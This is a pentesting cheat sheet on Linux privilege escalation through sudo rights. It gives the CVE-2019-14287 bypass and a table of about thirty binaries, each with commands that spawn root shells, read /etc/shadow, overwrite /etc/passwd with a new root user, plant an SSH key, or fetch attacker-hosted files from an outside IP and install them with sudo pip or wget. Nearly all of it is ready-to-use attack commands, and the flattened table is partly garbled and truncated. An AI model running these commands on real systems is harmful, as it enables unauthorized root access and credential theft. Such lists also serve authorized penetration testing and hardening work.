Abusing Sudo Rights

Resources

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

https://gtfobins.github.io/


CVE 2019-14287

# Exploitable when a user have the following permissions (sudo -l)
(ALL, !root) ALL

# If you have a full TTY, you can exploit it like this
sudo -u#-1 /bin/bash

# If no TTY, you can restart SSH server and add your key
sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bash


Exploiting sudo

Binary program Commands Infos
apache2 sudo apache2 -f /etc/shadow # You will get an error and it will # display first line
apt-get sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
awk sudo awk ‘BEGIN {system(“/bin/sh”)}’
ed sudo /usr/bin/ed !/bin/sh
find sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \;
ftp sudo ftp ftp> /!/bin/bash
gdb sudo -u user gdb -q (gdb) shell
git # Method 1 sudo -u user git -c core.pager=/tmp/script.sh –paginate help # Method 2 sudo git help add !/bin/bash # Method 1 Create script.sh and chmod 777 → /bin/bash >&2 0>&2 # Method 2 You can also use the help add feature
ht export TERM=xterm-color sudo ht /etc/sudoers # F3 to open the file, then update lines ALL=(ALL) NOPASSWD: ALL
less sudo less /etc/hosts !sh
man sudo man man !sh
more sudo more /etc/hosts !sh
mount sudo mount -o bind /bin/bash /bin/mount sudo mount
mysql sudo mysql -e ‘!/bin/sh’
nano sudo nano /etc/passwd # You can then add a new root user openssl passwd -1 -salt user3 pass123 # /etc/passwd user3::0:0:root:/root:/bin/bash
nmap # Method 1 sudo nmap –interactive nmap> !sh # Method 2 echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse # Method 1 # Using –interactive option # Method 2 # Using –script option
pico sudo -u user pico # Type bash in editor an press ^T to # trigger spellchecker
pip python -m SimpleHTTPServer 80 wget http://192.168.1.134/setup.py sudo pip install . –upgrade –force-reinstall # You can use FakePip https://github.com/0x00-0x00/FakePip.git # Decode and change IP adress
rbash echo $SHELL echo $PATH export SHELL=/bin/bash:$SHELL export PATH=/usr/bin:$PATH vi :!/bin/bash
rvim rvim version grep python echo “import os;os.system(‘bash’)” > /tmp/script.py sudo -u rvim -c “pyfile /tmp/script.py”
scp sudo -u user scp -vv -C -S tmp/script.sh a whatever # Create script.sh and chmod 777 → /bin/bash >&2 0>&2
script sudo -u user script /tmp/what-ever
ssh sudo -u user ssh -o ProxyCommand=/tmp/script.sh lel # Create script.sh and chmod 777 → /bin/bash >&2 0>&2
strace / sysud64 sudo strace -o/dev/null /bin/bash sudo sysud64 -o/dev/null /bin/bash
tar # Method 1 sudo -u user tar –checkpoint=1 –checkpoint-action=exec=/bin/bash -cf /tmp/12345.tar /dev/zero # Method 2 cd /tmpcp /bin/bash . sudo chown root:root /tmp/bash sudo mv /bin/tar /bin/tar.bak sudo mv /tmp/bash /bin/tar sudo /bin/tar
tcpdump echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
teehee echo “raaj::0:0:::/bin/bash” sudo teehee -a /etc/passwd
vim sudo vim -c ‘!sh’
wget sudo wget http://ip/filePasswd -O /etc/passwd su user1 # Attacker side # Copy target’s file /etc/passwd # Add a new user and host the fil
zip # Method 1 touch /tmp/xyz; chmod 444 /tmp/xyz sudo -u user zip /tmp/zzz.zip /tmp/xyz -T -TT /tmp/script.sh # Method 2 touch raj sudo zip /tmp/nisha.zip /home/zico/raj -T –unzip-command=“sh -c /bin/bash” # Create script.sh and chmod 777 → /bin/bash >&2 0>&2